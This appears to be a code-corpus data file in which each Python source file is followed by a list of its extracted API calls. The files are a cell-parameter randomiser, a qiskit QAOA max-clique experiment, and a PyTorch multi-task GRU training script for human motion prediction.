] | [((425, 448), 'tensorflow.variable_scope', 'tf.variable_scope', (['name'], {}), '(name)\n', (442, 448), True, 'import tensorflow as tf\n'), ((553, 596), 'tensorflow.random_normal_initializer', 'tf.random_normal_initializer', ([], {'stddev': 'stddev'}), '(stddev=stddev)\n', (581, 596), True, 'import tensorflow as tf\n'), ((756, 776), 'tensorflow.matmul', 'tf.matmul', (['input_', 'w'], {}), '(input_, w)\n', (765, 776), True, 'import tensorflow as tf\n'), ((118, 127), 'tensorflow.abs', 'tf.abs', (['x'], {}), '(x)\n', (124, 127), True, 'import tensorflow as tf\n'), ((141, 153), 'tensorflow.square', 'tf.square', (['x'], {}), '(x)\n', (150, 153), True, 'import tensorflow as tf\n'), ((155, 164), 'tensorflow.abs', 'tf.abs', (['x'], {}), '(x)\n', (161, 164), True, 'import tensorflow as tf\n'), ((689, 724), 'tensorflow.constant_initializer', 'tf.constant_initializer', (['bias_start'], {}), '(bias_start)\n', (712, 724), True, 'import tensorflow as tf\n'), ((209, 218), 'tensorflow.abs', 'tf.abs', (['x'], {}), '(x)\n', (215, 218), True, 'import tensorflow as tf\n'), ((232, 244), 'tensorflow.square', 'tf.square', (['x'], {}), '(x)\n', (241, 244), True, 'import tensorflow as tf\n'), ((246, 255), 'tensorflow.abs', 'tf.abs', (['x'], {}), '(x)\n', (252, 255), True, 'import tensorflow as tf\n')] |
"""Cell parameter random initializations."""
from typing import Any, Dict
import numpy as np
from ..parameters import (
Height,
NewCellBendLowerLower,
NewCellBendLowerUpper,
NewCellBendOverallLower,
NewCellBendOverallUpper,
NewCellBendUpperLower,
NewCellBendUpperUpper,
NewCellLength1Mean,
NewCellLength1Std,
NewCellLength2Mean,
NewCellLength2Std,
NewCellLengthAbsoluteMax,
NewCellLengthAbsoluteMin,
NewCellRadiusFromCenter,
NewCellWidthAbsoluteMax,
NewCellWidthAbsoluteMin,
NewCellWidthMean,
NewCellWidthStd,
Width,
)
from ..random import RRF, enforce_bounds
RandomSequenceType = Dict[str, Any]
class RandomWidthLength:
"""Random initializations for cell width/lengths."""
@staticmethod
def random_sequences(sequence: RRF) -> RandomSequenceType:
assert NewCellLength1Mean.value > NewCellWidthMean.value
assert NewCellLength2Mean.value > NewCellWidthMean.value
def ensure_length_greater_width(length, width):
for inner_length, inner_width in zip(length, width):
if inner_length > inner_width:
yield [inner_length, inner_width]
return dict(
length__width=RRF.chain(
ensure_length_greater_width,
length=RRF.compose(
lambda raw_lengths, choice: raw_lengths[choice],
raw_lengths=RRF.chain(
enforce_bounds,
iterator=sequence.multivariate_normal(
[NewCellLength1Mean.value, NewCellLength2Mean.value],
[
[NewCellLength1Std.value, 0.0],
[0.0, NewCellLength2Std.value],
],
),
minimum=NewCellLengthAbsoluteMin.value,
maximum=NewCellLengthAbsoluteMax.value,
),
choice=sequence.integers(0, 1),
),
width=RRF.chain(
enforce_bounds,
iterator=sequence.normal(
NewCellWidthMean.value, NewCellWidthStd.value
),
minimum=NewCellWidthAbsoluteMin.value,
maximum=NewCellWidthAbsoluteMax.value,
),
)
)
class RandomBentRod:
"""Random initializations for cell bent radii."""
@staticmethod
def random_sequences(sequence: RRF) -> RandomSequenceType:
return dict(
bend_overall=sequence.uniform(
NewCellBendOverallLower.value,
NewCellBendOverallUpper.value,
),
bend_upper=sequence.uniform(
NewCellBendUpperLower.value, NewCellBendUpperUpper.value
),
bend_lower=sequence.uniform(
NewCellBendLowerLower.value, NewCellBendLowerUpper.value
),
)
class RandomPosition:
"""Random initializations for cell positions."""
@staticmethod
def random_sequences(sequence: RRF) -> RandomSequenceType:
return dict(
position=RRF.compose(
lambda radius, angle: [
float(radius * np.cos(angle) + Width.value / 2),
float(radius * np.sin(angle) + Height.value / 2),
],
radius=sequence.uniform(0, NewCellRadiusFromCenter.value),
angle=RRF.wrap(sequence.uniform(0, 360.0), np.radians),
)
)
class RandomAngle:
"""Random initializations for cell angles."""
@staticmethod
def random_sequences(sequence: RRF) -> RandomSequenceType:
return dict(angle=RRF.wrap(sequence.uniform(0, 360.0), np.radians))
class RandomFluorescence:
"""Random initializations for fluorescences."""
@staticmethod
def random_sequences(sequence: RRF) -> RandomSequenceType:
return dict(fluorescences=sequence.uniform(0, 360.0, (1,)))
| [
"numpy.sin",
"numpy.cos"
] | [((3328, 3341), 'numpy.cos', 'np.cos', (['angle'], {}), '(angle)\n', (3334, 3341), True, 'import numpy as np\n'), ((3397, 3410), 'numpy.sin', 'np.sin', (['angle'], {}), '(angle)\n', (3403, 3410), True, 'import numpy as np\n')] |
import qiskit
import numpy as np
import matplotlib.pyplot as plt
import json
from graph import *
# Random comment
P =1
def makeCircuit(inbits, outbits):
q = qiskit.QuantumRegister(inbits+outbits)
c = qiskit.ClassicalRegister(inbits+outbits)
qc = qiskit.QuantumCircuit(q, c)
q_input = [q[i] for i in range(outbits,outbits+inbits)]
q_output = [q[j] for j in range(outbits)]
return qc, c, q_input, q_output
# measure all qubits in q_input register, return dictionary of samples
def measureInput(qc, q_input, c):
for i in range(len(q_input)):
qc.measure(q_input[i], c[i])
job = qiskit.execute(qc, backend='local_qasm_simulator', shots=1024)
return job.result().get_counts(qc)
def test5(qc, q_input, c):
data = measureInput(qc, q_input, c)
# assemble data from dictionary into list
parsed = []
xticks = []
n = len(q_input)
for i in range(2**n):
bits = np.binary_repr(i, width=n)
xticks.append(bits)
bits += "00"
if bits in data: parsed.append(data[bits])
else: parsed.append(0)
plt.bar(range(2**n), parsed)
plt.xticks(range(2**n),xticks,rotation="vertical")
plt.xlabel('Outcomes')
plt.ylabel('Counts')
plt.title('Measurement Histogram')
plt.show()
def applyQAOA(gamma, beta, graph):
### INIT REGS
qc, c, q_input, q_output = makeCircuit(graph.getNumNodes(), 1);
PENALTY = graph.getMaxEdges()
### H on every input register
for node in q_input:
qc.h(node)
complement = graph.getEdgesComp();
edges = graph.getEdges()
### APPLY V AND W
### APPLY V
# EDGES IN THE GRAPH
for edge in edges:
nodeList = edge.getNodes()
qc.cu1(-gamma, q_input[nodeList[0].name], q_input[nodeList[1].name])
# EDGES NOT IN THE GRAPH
for edge in complement:
nodeList = edge.getNodes()
qc.cu1(PENALTY*gamma, q_input[nodeList[0].name], q_input[nodeList[1].name])
### APPLY W
for node in q_input:
qc.h(node)
qc.u1(2*beta, node)
qc.h(node)
### Measure
results = measureInput(qc, q_input, c)
### Compute the result expectation
### Parse the result list.
# B/c we only care about counts associated with input register
# we combine the counts of states with same input register bits
counts = dict()
for key in results:
if key[1:] not in counts:
counts[key[1:]] = results[key]
else:
counts[key[1:]] += results[key]
#print(counts)
eox = 0
eox2 = 0
for val in counts:
cliqNum = 0
for edge in edges:
nodeList = edge.getNodes()
#print("Node 1:", nodeList[0].name,"Node 2:", nodeList[1].name)
if val[nodeList[0].name] == '1' and val[nodeList[1].name] == '1':
cliqNum += 1
for edge in complement:
nodeList = edge.getNodes()
if val[nodeList[0].name] == '1' and val[nodeList[1].name] == '1':
cliqNum -= PENALTY
eox += counts[val]/1024 * cliqNum
eox2 += (cliqNum**2) * counts[val]/1024
std = np.sqrt((len(counts)/(len(counts) -1))*(eox2 - eox**2))
return eox, std
### gradient ascent optimizer
# graph is graph to optimize over
# epsilon controls how far out the delta is calculated
# eta is learning rate
# threshold is the average of gamma and beta that we will consider a max
def optimize(graph, epsilon, eta, threshold):
count = 0
gamma = 2
beta = 2
dgamma = (applyQAOA(gamma + epsilon, beta, graph) - applyQAOA(gamma - epsilon, beta, graph))/(2*epsilon)
dbeta = (applyQAOA(gamma, beta + epsilon, graph) - applyQAOA(gamma, beta + epsilon, graph))/(2*epsilon)
flipper = True #Alternate between maxing gamma and maxing beta
while((abs(dgamma) + abs(dbeta))/2 > threshold):
if(flipper):
if (dgamma > 0):
gamma = (gamma + (dgamma * eta)) % (2*np.pi)
elif (dgamma < 0):
gamma = (gamma - (dgamma * eta)) % (2*np.pi)
dgamma = (applyQAOA(gamma + epsilon, beta, graph) - applyQAOA(gamma - epsilon, beta, graph))/(2*epsilon)
else:
if(dbeta > 0):
beta = (beta + (dbeta * eta)) % np.pi
elif (dbeta < 0):
beta = (beta - (dbeta * eta)) % np.pi
dbeta = (applyQAOA(gamma, beta + epsilon, graph) - applyQAOA(gamma, beta + epsilon, graph))/(2*epsilon)
count+=1
print("Count", count, "dg", dgamma, "db", dbeta)
flipper = not flipper
print(count)
return gamma, beta
def main():
###TESTING GRAPH
#0---1
#| / |
#3---2
myGraph = Graph(0, 0)
nodes = [Node(i) for i in range(4)]
edges = []
edges.append(Edge(nodes[0], nodes[1]))
edges.append(Edge(nodes[1], nodes[2]))
edges.append(Edge(nodes[2], nodes[3]))
edges.append(Edge(nodes[3], nodes[0]))
edges.append(Edge(nodes[3], nodes[1]))
for n in nodes:
myGraph.addNode(n)
for e in edges:
myGraph.addEdge(e)
### Run the algorithm
#expect = applyQAOA(gamma, beta, myGraph)
#print("Expectation Value:", expect)
### OPTIMIZE
#bestGamma, bestBeta = optimize(myGraph, 0.1, 0.1, 0.05)
#print("BestGamma: ", bestGamma, "bestBeta", bestBeta)
#print("Optimized Expectation value", applyQAOA(bestGamma, bestBeta, myGraph))
#print("Optimal Gamma:", bestGamma, "Optimal Beta:", bestBeta)
#BestGamma: 4.6015625 bestBeta 0.18702062766020688
#Optimized Expectation value -0.3115234375
### Make graphs.
# I'm thinking we hold one variable constant at its maxed value
# and vary the other and vice versa.
# Gamma has a larger range than beta. Do we want more data points for gamma than beta?
# The last page of the worksheet says exactly which graphs we need in our report
# so make sure we have at least those
BestGamma = 4.6015625
BestBeta = 0.18702062766020688
betas = np.linspace(0, np.pi, 10)
gammas = np.linspace(0, 2*np.pi, 100)
varyingBeta = []
varyingGamma = []
betaSTD = []
gammaSTD = []
y = []
std = []
for gammaa in gammas:
e, s = applyQAOA(gammaa, BestBeta, myGraph)
y.append(e)
std.append(s)
with open("varyingGamma.txt", 'w') as f:
json.dump(y, f)
with open("gammaSTD.txt", 'w') as f:
json.dump(std, f)
"""
y = []
std = []
for betaa in betas:
e, s = applyQAOA(BestGamma, betaa, myGraph)
y.append(e)
std.append(s)
with open("varyingBeta.txt", 'w') as f:
json.dump(y, f)
with open("betaSTD.txt", 'w') as f:
json.dump(std, f)
"""
with open("varyingGamma.txt", 'r') as f:
varyingGamma = json.load(f)
#with open("varyingBeta.txt", 'r') as f:
# varyingBeta = json.load(f)
#with open("betaSTD.txt", 'r') as f:
# betaSTD = json.load(f)
with open("gammaSTD.txt", 'r') as f:
gammaSTD = json.load(f)
#betaG = plt.errorbar(betas, varyingBeta, betaSTD, ecolor='black', elinewidth = 0.5, capsize=3)
gammaG = plt.errorbar(gammas, varyingGamma, gammaSTD, ecolor='black', elinewidth = 0.5, capsize=3)
plt.legend(('Gamma Graph',))
plt.xlabel('Gamma values')
plt.ylabel('Expectation Value')
plt.title('Expectation Value vs Gamma holding Beta constant')
plt.show()
main()
| [
"qiskit.ClassicalRegister",
"matplotlib.pyplot.title",
"qiskit.execute",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"json.dump",
"numpy.binary_repr",
"numpy.linspace",
"matplotlib.pyplot.errorbar",
"json.load",
"qiskit.QuantumCircuit",
"qiskit.QuantumRegister",
"matplotlib.pyplo... | [((162, 202), 'qiskit.QuantumRegister', 'qiskit.QuantumRegister', (['(inbits + outbits)'], {}), '(inbits + outbits)\n', (184, 202), False, 'import qiskit\n'), ((209, 251), 'qiskit.ClassicalRegister', 'qiskit.ClassicalRegister', (['(inbits + outbits)'], {}), '(inbits + outbits)\n', (233, 251), False, 'import qiskit\n'), ((259, 286), 'qiskit.QuantumCircuit', 'qiskit.QuantumCircuit', (['q', 'c'], {}), '(q, c)\n', (280, 286), False, 'import qiskit\n'), ((619, 681), 'qiskit.execute', 'qiskit.execute', (['qc'], {'backend': '"""local_qasm_simulator"""', 'shots': '(1024)'}), "(qc, backend='local_qasm_simulator', shots=1024)\n", (633, 681), False, 'import qiskit\n'), ((1179, 1201), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Outcomes"""'], {}), "('Outcomes')\n", (1189, 1201), True, 'import matplotlib.pyplot as plt\n'), ((1206, 1226), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Counts"""'], {}), "('Counts')\n", (1216, 1226), True, 'import matplotlib.pyplot as plt\n'), ((1231, 1265), 'matplotlib.pyplot.title', 'plt.title', (['"""Measurement Histogram"""'], {}), "('Measurement Histogram')\n", (1240, 1265), True, 'import matplotlib.pyplot as plt\n'), ((1270, 1280), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1278, 1280), True, 'import matplotlib.pyplot as plt\n'), ((6086, 6111), 'numpy.linspace', 'np.linspace', (['(0)', 'np.pi', '(10)'], {}), '(0, np.pi, 10)\n', (6097, 6111), True, 'import numpy as np\n'), ((6125, 6155), 'numpy.linspace', 'np.linspace', (['(0)', '(2 * np.pi)', '(100)'], {}), '(0, 2 * np.pi, 100)\n', (6136, 6155), True, 'import numpy as np\n'), ((7261, 7352), 'matplotlib.pyplot.errorbar', 'plt.errorbar', (['gammas', 'varyingGamma', 'gammaSTD'], {'ecolor': '"""black"""', 'elinewidth': '(0.5)', 'capsize': '(3)'}), "(gammas, varyingGamma, gammaSTD, ecolor='black', elinewidth=0.5,\n capsize=3)\n", (7273, 7352), True, 'import matplotlib.pyplot as plt\n'), ((7355, 7383), 'matplotlib.pyplot.legend', 'plt.legend', (["('Gamma Graph',)"], {}), "(('Gamma Graph',))\n", (7365, 7383), True, 'import matplotlib.pyplot as plt\n'), ((7388, 7414), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Gamma values"""'], {}), "('Gamma values')\n", (7398, 7414), True, 'import matplotlib.pyplot as plt\n'), ((7419, 7450), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Expectation Value"""'], {}), "('Expectation Value')\n", (7429, 7450), True, 'import matplotlib.pyplot as plt\n'), ((7455, 7516), 'matplotlib.pyplot.title', 'plt.title', (['"""Expectation Value vs Gamma holding Beta constant"""'], {}), "('Expectation Value vs Gamma holding Beta constant')\n", (7464, 7516), True, 'import matplotlib.pyplot as plt\n'), ((7521, 7531), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (7529, 7531), True, 'import matplotlib.pyplot as plt\n'), ((929, 955), 'numpy.binary_repr', 'np.binary_repr', (['i'], {'width': 'n'}), '(i, width=n)\n', (943, 955), True, 'import numpy as np\n'), ((6440, 6455), 'json.dump', 'json.dump', (['y', 'f'], {}), '(y, f)\n', (6449, 6455), False, 'import json\n'), ((6506, 6523), 'json.dump', 'json.dump', (['std', 'f'], {}), '(std, f)\n', (6515, 6523), False, 'import json\n'), ((6897, 6909), 'json.load', 'json.load', (['f'], {}), '(f)\n', (6906, 6909), False, 'import json\n'), ((7130, 7142), 'json.load', 'json.load', (['f'], {}), '(f)\n', (7139, 7142), False, 'import json\n')] |
"""Simple code for training an RNN for motion prediction."""
import os
import sys
import time
import numpy as np
import torch
import torch.optim as optim
from torch.autograd import Variable
import mtfixb_model
import mtfixb_model2
import parseopts
def create_model(args, total_num_batches):
"""Create MT model and initialize or load parameters in session."""
if len(args.load) > 0:
print("Loading model")
model = torch.load(args.load, map_location="cpu") if args.use_cpu else torch.load(args.load)
return model
if args.k == 0:
return create_model_k0(args, total_num_batches)
if args.dynamicsdict:
return create_model_DD(args, total_num_batches)
if args.biasonly:
return create_model_BiasOnly(args, total_num_batches)
if args.nobias:
return create_model_NoMTBias(args, total_num_batches)
model = mtfixb_model.MTGRU(
args.seq_length_out,
args.decoder_size,
args.decoder_size2,
args.batch_size,
total_num_batches,
args.k,
args.size_psi_hidden,
args.size_psi_lowrank,
args.bottleneck,
output_dim=args.human_size,
input_dim=args.input_size,
dropout=args.dropout_p,
residual_output=args.residual_velocities,
init_state_noise=args.init_state_noise,
mt_rnn=args.mt_rnn,
psi_affine=args.psi_affine,
)
if len(args.load) <= 0:
if len(args.load_layer1) > 0:
print("Loading GRU2 model")
model = load_layer1(model, args.load_layer1, args.use_cpu)
return model
print("Loading model")
model = torch.load(args.load, map_location="cpu") if args.use_cpu else torch.load(args.load)
return model
def create_model_k0(args, total_num_batches):
"""Create MT model and initialize or load parameters in session."""
model = mtfixb_model.OpenLoopGRU(
args.seq_length_out,
args.decoder_size,
args.batch_size,
args.human_size,
args.input_size,
args.dropout_p,
args.residual_velocities,
args.init_state_noise,
)
return model
def create_model_DD(args, total_num_batches):
"""Create MT model and initialize or load parameters in session."""
if len(args.load_layer1) > 0:
NotImplementedError("Layer 1 load not yet implemented for Dynamics Dict.")
model = mtfixb_model.DynamicsDict(
args.seq_length_out,
args.decoder_size,
total_num_batches,
args.batch_size,
args.k,
args.size_psi_hidden,
args.size_psi_lowrank,
args.human_size,
args.input_size,
args.dropout_p,
args.residual_velocities,
args.init_state_noise,
)
return model
def create_model_BiasOnly(args, total_num_batches):
"""Create MT model and initialize or load parameters in session."""
if len(args.load_layer1) > 0:
NotImplementedError("Layer 1 load not yet implemented for MT Bias Only.")
model = mtfixb_model.MTGRU_BiasOnly(
args.seq_length_out,
args.decoder_size,
args.decoder_size2,
args.batch_size,
total_num_batches,
args.k,
args.size_psi_hidden,
args.size_psi_lowrank,
args.bottleneck,
output_dim=args.human_size,
input_dim=args.input_size,
dropout=args.dropout_p,
residual_output=args.residual_velocities,
init_state_noise=args.init_state_noise,
)
return model
def create_model_NoMTBias(args, total_num_batches):
"""Create MT model and initialize or load parameters in session."""
if len(args.load_layer1) > 0:
NotImplementedError("Layer 1 load not yet implemented for MT Bias Only.")
model = mtfixb_model2.MTGRU_NoBias(
args.seq_length_out,
args.decoder_size,
args.decoder_size2,
args.batch_size,
total_num_batches,
args.k,
args.size_psi_hidden,
args.size_psi_lowrank,
args.bottleneck,
output_dim=args.human_size,
input_dim=args.input_size,
dropout=args.dropout_p,
residual_output=args.residual_velocities,
init_state_noise=args.init_state_noise,
mt_rnn=args.mt_rnn,
psi_affine=args.psi_affine,
)
return model
def train(args):
"""Train a MT model on human motion"""
train_iter = read_all_data(args)
train_iter.shuffle()
total_num_batches = train_iter.total_length()
model = create_model(args, total_num_batches)
model = model if args.use_cpu else model.cuda()
has_weight = not np.isclose(args.first3_prec, 1.0)
is_hard_em = args.hard_em_iters > 0
is_MT = args.k > 0
current_step = 0
previous_losses = []
step_time, loss = 0, 0
mt_lr = args.learning_rate_mt if args.learning_rate_mt >= 0 else args.learning_rate
z_lr = args.learning_rate_z if args.learning_rate_z >= 0 else args.learning_rate
zls_lr = 0 if is_hard_em else z_lr
pars_lrs, zls_ix = model.get_params_optim_dicts(mt_lr, args.learning_rate, z_lr, zls_lr=zls_lr)
if args.optimiser.upper() == "SGD":
optimiser = optim.SGD(pars_lrs, weight_decay=args.weight_decay)
elif args.optimiser.upper() == "NESTEROV":
optimiser = optim.SGD(pars_lrs, momentum=0.8, nesterov=True, weight_decay=args.weight_decay)
elif args.optimiser.upper() == "ADAM":
optimiser = optim.Adam(pars_lrs, betas=(0.9, 0.999), weight_decay=args.weight_decay)
else:
Exception("Unknown optimiser type: {:d}. Try 'SGD', 'Nesterov' or 'Adam'")
has_ar_noise = args.ar_coef > 0
device = "cpu" if args.use_cpu else "cuda"
if has_ar_noise:
assert args.ar_coef < 1, "ar_coef must be in [0, 1)."
# Construct banded AR precision matrix (fn def below)
Prec = ar_prec_matrix(args.ar_coef, args.seq_length_out).float().to(device)
for _ in range(args.iterations):
optimiser.zero_grad()
model.train()
start_time = time.time()
# ------------------------------------------------------- TRAINING
inputs, outputs, c_ids = model.get_batch(train_iter)
inputs, outputs = torchify(inputs, outputs, device=device)
if is_MT:
mu = model.mt_net.Z_mu[c_ids, :]
sd = torch.sigmoid(3 * model.mt_net.Z_logit_s[c_ids, :])
preds, _state = model(inputs, mu, sd)
else:
preds, _state = model(inputs)
err = preds - outputs
if has_weight:
err = err * torch.cat(
(torch.ones(1, 1, 3) * np.sqrt(args.first3_prec), torch.ones(1, 1, args.human_size - 3)), dim=2
).to(err.device)
if not has_ar_noise:
sqerr = err ** 2
else:
sqerr = (Prec @ err) * err
step_loss = args.human_size * args.seq_length_out * sqerr.mean() / 2
# assume \sigma is const. wrt optimisation, and hence normalising constant can be ignored.
# Now for KL term. Since we're descending *negative* L.B., we need to *ADD* KL to loss:
if is_MT:
logstd = torch.log(sd)
KLD = -0.5 * torch.sum(1 + 2 * logstd - mu.pow(2) - torch.exp(2 * logstd))
step_loss = step_loss + KLD
# Actual backpropagation
step_loss.backward()
optimiser.step()
# -------------------------------------------------------
# Reporting / admin
step_loss = step_loss.cpu().data.numpy()
if current_step % 10 == 0:
if is_MT:
KLD_part = KLD.cpu().data.numpy()
print(
"step {0:04d}; step_loss: {1:.4f} ({2:.4f})".format(current_step, step_loss, step_loss - KLD_part)
)
else:
print("step {0:04d}; step_loss: {1:.4f}".format(current_step, step_loss))
step_time += (time.time() - start_time) / args.test_every
loss += step_loss / args.test_every
current_step += 1
if current_step % 20 == 0:
sys.stdout.flush()
# Decay learning rate (if appl.)
if current_step % args.learning_rate_step == 0:
for param_group in optimiser.param_groups:
param_group["lr"] *= args.learning_rate_decay_factor
print("Decay learning rate. New value at " + str(optimiser.param_groups[0]["lr"]))
# remove Hard EM spec (if appl.)
if is_hard_em and zls_ix is not None and current_step == args.hard_em_iters:
optimiser.param_groups[zls_ix]["lr"] = z_lr
model.standardise_aggregate_posterior()
# Once in a while, we save checkpoint, print statistics, and run evals.
if current_step % args.test_every == 0:
model.eval()
# === CANNOT DO TEST SET EVALUATION SINCE DONT KNOW LATENT Z ===
# inputs, outputs = model.get_test_batch(test_set_Y, test_set_U, -1)
# inputs, outputs = torchify(inputs, outputs, device=device)
#
# if is_MT:
# preds, state = model(inputs, mu, sd)
# else:
# preds = model(inputs)
#
# err = (preds - outputs)
# if has_weight:
# err = err * torch.cat((torch.ones(1, 1, 3) * np.sqrt(args.first3_prec),
# torch.ones(1, 1, args.human_size - 3)), dim=2).to(err.device)
#
# if not has_ar_noise:
# sqerr = err ** 2
# else:
# Prec_test = ar_prec_matrix(args.ar_coef, err.size(1)).float().to(device)
# sqerr = (Prec_test @ err) * err
#
# val_loss = args.human_size * args.seq_length_out * sqerr.mean() / 2
#
# if is_MT:
# logstd = torch.log(sd)
# KLD = -0.5 * torch.sum(1 + 2 * logstd - mu.pow(2) - torch.exp(2 * logstd))
# val_loss = val_loss + KLD
#
# print()
# print("{0: <16} |".format("milliseconds"), end="")
# for ms in [60, 240, 480, 750, 990, 1500, 2010]:
# print(" {0:5d} |".format(ms), end="")
# print()
#
# avg_mse_tt = sqerr.detach().cpu().mean(dim=0).numpy().mean(axis=1)
# Pretty print of the results for 60, 240, 480, 750, 990, 1500, 2010 ms
# print("{0: <16} |".format(" "), end="")
# for ms in [1, 7, 15, 24, 32, 49, 66]:
# if args.seq_length_out >= ms + 1:
# print(" {0:.3f} |".format(avg_mse_tt[ms]), end="")
# else:
# print(" n/a |", end="")
# print()
#
# print()
# print("============================\n"
# "Global step: %d\n"
# "Learning rate: %.4f\n"
# "Step-time (ms): %.4f\n"
# "Train loss avg: %.4f\n"
# "--------------------------\n"
# "Test loss: %.4f\n"
# "============================" % (current_step,
# args.learning_rate, step_time * 1000, loss,
# val_loss))
torch.save(model, args.train_dir + "/model_" + str(current_step))
# print()
previous_losses.append(loss)
# Reset global time and loss
step_time, loss = 0, 0
sys.stdout.flush()
def sample(args):
raise NotImplementedError("Sampling not yet implemented: unsure how to deal with unknown latent z.")
train_set_Y, train_set_U, test_set_Y, test_set_U = read_all_data(args)
model = create_model(args)
model.eval()
if not args.use_cpu:
model = model.cuda()
print("Model created")
inputs, outputs = model.get_test_batch(test_set_Y, test_set_U, -1)
inputs = Variable(torch.from_numpy(inputs).float())
outputs = Variable(torch.from_numpy(outputs).float())
if not args.use_cpu:
inputs, outputs, inputs.cuda(), outputs.cuda()
if args.k > 0:
preds, mu, logstd, state = model(inputs, outputs)
else:
preds = model(inputs)
loss = (preds - outputs) ** 2
loss.cpu().data.numpy()
loss = loss.mean()
preds = preds.cpu().data.numpy()
preds = preds.transpose([1, 0, 2])
loss = loss.cpu().data.numpy()
np.savez("mt_predictions_{0}.npz".format(args.style_ix), preds=preds, actual=outputs)
return
def ar_prec_matrix(rho, n):
# Banded covariance construction
Prec = np.zeros((n, n))
i, j = np.indices(Prec.shape)
Prec[i == j] = 1 + rho ** 2
Prec[i == j - 1] = -rho
Prec[i == j + 2] = -rho
return torch.tensor(Prec)
def load_layer1(model, layer1_filename, use_cpu):
model_gru1 = torch.load(layer1_filename, map_location="cpu") if use_cpu else torch.load(layer1_filename)
if isinstance(model_gru1, mtfixb_model.OpenLoopGRU):
model.layer1_rnn = model_gru1.rnn
# model.layer1_linear = model_gru2.emission
else:
model.layer1_rnn = model_gru1.rnn2
return model
def read_all_data(args):
"""
Loads data for training/testing and normalizes it.
Args
data_dir: directory to load the data from
style_ix: style index of the test set (and leave out from the training set)
njoints: number of joints to model (0 or -1 = all)
Returns
train_set: dictionary with normalized training data
test_set: dictionary with test data
data_mean: d-long vector with the mean of the training data
data_std: d-long vector with the standard dev of the training data
dim_to_ignore: dimensions that are not used becaused stdev is too small
dim_to_use: dimensions that we are actually using in the model
"""
# === Read training data ===
print("Reading training data (test index {0:d}).".format(args.style_ix))
njoints = args.human_size
if not args.train_set_size == -1:
style_lkp = {
str(i): range(1 + args.train_set_size * (i - 1), 1 + args.train_set_size * i) for i in range(1, 8 + 1)
}
else:
style_lkp = np.load(os.path.join(args.data_dir, args.stylelkp_fname))
train_set_Y = np.load(os.path.join(args.data_dir, args.output_fname))
train_set_U = np.load(os.path.join(args.data_dir, args.input_fname))
njoints = train_set_Y[str(0)].shape[1] if njoints <= 0 else njoints
if args.train_set_size != 0:
train_ixs = np.concatenate(
[
style_lkp[str(i)] for i in range(1, len(style_lkp.keys()) + 1) if i != args.style_ix
] # CAREFUL: jl is 1-based!
)
train_set_Y = [train_set_Y[str(i)][:, :njoints] for i in train_ixs]
train_set_U = [train_set_U[str(i)] for i in train_ixs]
else:
assert args.style_ix not in range(1, 9), "no support for LOO experiments with max MTL data yet. Use style_ix=9"
train_set_Y = [train_set_Y[str(i + 1)][:, :njoints] for i in range(len(train_set_Y))]
train_set_U = [train_set_U[str(i + 1)] for i in range(len(train_set_U))]
print("Using files {:s}; {:s}".format(args.input_fname, args.output_fname))
print("done reading data.")
return mtfixb_model.DataIterator(train_set_Y, train_set_U, 64, min_size=64, overlap2=args.overlap_windows)
def torchify(*args, device="cpu"):
return [Variable(torch.from_numpy(arg).float()).to(device) for arg in args]
def main(args=None):
args = parseopts.parse_args(args)
args = parseopts.initial_arg_transform(args)
print(args.train_dir)
os.makedirs(args.train_dir, exist_ok=True)
if args.sample:
sample(args)
else:
train(args)
return args
if __name__ == "__main__":
main()
| [
"numpy.sqrt",
"torch.from_numpy",
"parseopts.parse_args",
"torch.exp",
"parseopts.initial_arg_transform",
"mtfixb_model2.MTGRU_NoBias",
"mtfixb_model.MTGRU",
"mtfixb_model.DataIterator",
"mtfixb_model.OpenLoopGRU",
"sys.stdout.flush",
"torch.optim.SGD",
"mtfixb_model.DynamicsDict",
"numpy.in... | [((890, 1307), 'mtfixb_model.MTGRU', 'mtfixb_model.MTGRU', (['args.seq_length_out', 'args.decoder_size', 'args.decoder_size2', 'args.batch_size', 'total_num_batches', 'args.k', 'args.size_psi_hidden', 'args.size_psi_lowrank', 'args.bottleneck'], {'output_dim': 'args.human_size', 'input_dim': 'args.input_size', 'dropout': 'args.dropout_p', 'residual_output': 'args.residual_velocities', 'init_state_noise': 'args.init_state_noise', 'mt_rnn': 'args.mt_rnn', 'psi_affine': 'args.psi_affine'}), '(args.seq_length_out, args.decoder_size, args.\n decoder_size2, args.batch_size, total_num_batches, args.k, args.\n size_psi_hidden, args.size_psi_lowrank, args.bottleneck, output_dim=\n args.human_size, input_dim=args.input_size, dropout=args.dropout_p,\n residual_output=args.residual_velocities, init_state_noise=args.\n init_state_noise, mt_rnn=args.mt_rnn, psi_affine=args.psi_affine)\n', (908, 1307), False, 'import mtfixb_model\n'), ((1893, 2083), 'mtfixb_model.OpenLoopGRU', 'mtfixb_model.OpenLoopGRU', (['args.seq_length_out', 'args.decoder_size', 'args.batch_size', 'args.human_size', 'args.input_size', 'args.dropout_p', 'args.residual_velocities', 'args.init_state_noise'], {}), '(args.seq_length_out, args.decoder_size, args.\n batch_size, args.human_size, args.input_size, args.dropout_p, args.\n residual_velocities, args.init_state_noise)\n', (1917, 2083), False, 'import mtfixb_model\n'), ((2414, 2680), 'mtfixb_model.DynamicsDict', 'mtfixb_model.DynamicsDict', (['args.seq_length_out', 'args.decoder_size', 'total_num_batches', 'args.batch_size', 'args.k', 'args.size_psi_hidden', 'args.size_psi_lowrank', 'args.human_size', 'args.input_size', 'args.dropout_p', 'args.residual_velocities', 'args.init_state_noise'], {}), '(args.seq_length_out, args.decoder_size,\n total_num_batches, args.batch_size, args.k, args.size_psi_hidden, args.\n size_psi_lowrank, args.human_size, args.input_size, args.dropout_p,\n args.residual_velocities, args.init_state_noise)\n', (2439, 2680), False, 'import mtfixb_model\n'), ((3045, 3423), 'mtfixb_model.MTGRU_BiasOnly', 'mtfixb_model.MTGRU_BiasOnly', (['args.seq_length_out', 'args.decoder_size', 'args.decoder_size2', 'args.batch_size', 'total_num_batches', 'args.k', 'args.size_psi_hidden', 'args.size_psi_lowrank', 'args.bottleneck'], {'output_dim': 'args.human_size', 'input_dim': 'args.input_size', 'dropout': 'args.dropout_p', 'residual_output': 'args.residual_velocities', 'init_state_noise': 'args.init_state_noise'}), '(args.seq_length_out, args.decoder_size, args.\n decoder_size2, 